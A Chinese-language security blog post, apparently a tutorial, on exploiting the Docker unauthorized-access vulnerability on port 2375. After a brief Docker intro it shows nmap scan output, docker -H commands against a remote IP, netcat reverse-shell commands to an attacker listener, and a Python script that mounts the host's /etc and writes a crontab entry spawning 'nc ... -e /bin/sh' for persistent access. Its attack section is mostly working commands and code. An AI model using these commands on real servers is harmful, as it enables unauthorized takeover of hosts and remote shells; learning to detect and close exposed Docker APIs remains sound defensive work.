网安系列【15】之Docker未授权访问漏洞

文章目录

Docker介绍

  • Docker是利用LXC来实现类似VM的功能,从而利用更加节省的硬件资源提供给用户更多的计算资源。同VM的方式不同,LXC其并不是一套硬件虚拟化方法-无法归属到全虚拟化、部分虚拟化和半虚拟化中的任意一个,而是一个操作系统级虚拟化方法,理解起来可能并不像VM那样直观。所以我们从虚拟化到docker要解决的问题出发,看看他是怎么满足用户虚拟化需求的。

Docker开启远程访问

bash 复制代码
systemctl status docker.service
bash 复制代码
vim /usr/lib/systemd/system/docker.service
bash 复制代码
-H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock

重新载入服务信息并重启docker

bash 复制代码
systemctl daemon-reload
systemctl restart docker.service
  • 防火墙状态设置
bash 复制代码
ufw status
ufw allow 2375
ufw reload

漏洞发现

  • 特定端口:2375
  • 搜索引擎:shodan、fofa
bash 复制代码
nmap -A -p- -T4 -Pn xx.xx.xx.xx
bash 复制代码
[root@yang ~]# nmap -A -p 2375 -T4 -Pn localhost
Starting Nmap 7.70 ( https://nmap.org ) at 2025-07-10 18:20 CST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00019s latency).
Other addresses for localhost (not scanned): ::1

PORT     STATE SERVICE VERSION
2375/tcp open  docker  Docker 25.0.1
| docker-version:
|   Components:
|
|       Version: 25.0.1
|       Name: Engine
|       Details:
|         ApiVersion: 1.44
|         BuildTime: 2024-01-23T23:09:31.000000000+00:00
|         MinAPIVersion: 1.24
|         Experimental: false
|         Os: linux
|         Arch: amd64
|         KernelVersion: 4.18.0-348.7.1.el8_5.x86_64
|         GitCommit: 71fa3ab
|         GoVersion: go1.21.6
|
|       Version: 1.6.27
|       Name: containerd
|       Details:
|         GitCommit: a1496014c916f9e62104b33d1bb5bd03b0858e59
|
|       Version: 1.1.11
|       Name: runc
|       Details:
|         GitCommit: v1.1.11-0-g4bccb38
|
|       Version: 0.19.0
|       Name: docker-init
|       Details:
|         GitCommit: de40ad0
|   BuildTime: 2024-01-23T23:09:31.000000000+00:00
|   ApiVersion: 1.44
|   GoVersion: go1.21.6
|   Arch: amd64
|   MinAPIVersion: 1.24
|   Os: linux
|   Version: 25.0.1
|   KernelVersion: 4.18.0-348.7.1.el8_5.x86_64
|   GitCommit: 71fa3ab
|   Platform:
|_    Name: Docker Engine - Community
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Not Found
|     Content-Type: application/json
|     Date: Thu, 10 Jul 2025 10:20:33 GMT
|     Content-Length: 29
|     {"message":"page not found"}
|   GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 404 Not Found
|     Content-Type: application/json
|     Date: Thu, 10 Jul 2025 10:20:08 GMT
|     Content-Length: 29
|     {"message":"page not found"}
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Api-Version: 1.44
|     Docker-Experimental: false
|     Ostype: linux
|     Server: Docker/25.0.1 (linux)
|     Date: Thu, 10 Jul 2025 10:20:08 GMT
|     Content-Length: 0
|   docker:
|     HTTP/1.1 400 Bad Request: missing required Host header
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|_    Request: missing required Host header
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.7 - 3.10
Network Distance: 0 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.60 seconds

漏洞利用

  • 通过api直接查看容器状态,可以使用version、info查看具体的信息,直接查看容器里的进程。
bash 复制代码
docker -H tcp://18.16.202.95:2375 version
docker -H tcp://18.16.202.95:2375 images
docker -H tcp://18.16.202.95:2375 info
docker -H tcp://18.16.202.95:2375 ps
  • 利用创建命令创建并运行容器。
bash 复制代码
docker -H tcp://xx.xx.xx.xx:2375 run -it redis /bin/bash

反弹shell

  • 攻击机开启监听
bash 复制代码
nc -lvvp 8030
  • 目标机器执行
bash 复制代码
nc 192.168.1.21 8030 -e bin/sh
nc 192.168.1.21 8030 -e sh

写入crontab反弹shell

bash 复制代码
cd /root
cat exp.py
bash 复制代码
import docker

client = docker.DockerClient(base_url='http://your-ip:2375')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw' }}):
相关推荐
亲爱的非洲野猪1 小时前
关于k8s Kubernetes的10个面试题
云原生·容器·kubernetes
西京刀客1 小时前
k8s之configmap
云原生·容器·kubernetes
极限实验室3 小时前
一键启动:使用 start-local 脚本轻松管理 INFINI Console 与 Easysearch 本地环境
数据库·docker
❀͜͡傀儡师3 小时前
docker 安装数据集成平台 Apache SeaTunnel 服务
docker·容器
超级小忍4 小时前
Spring Boot 与 Docker 的完美结合:容器化你的应用
spring boot·后端·docker
B1nna6 小时前
Docker学习
学习·docker·容器
慕木兮人可13 小时前
Docker部署MySQL镜像
spring boot·后端·mysql·docker·ecs服务器
armcsdn17 小时前
基于Docker Compose部署Traccar容器与主机MySQL的完整指南
mysql·docker·容器
凌晨两点的菜鸡18 小时前
前端部署-docker
前端·docker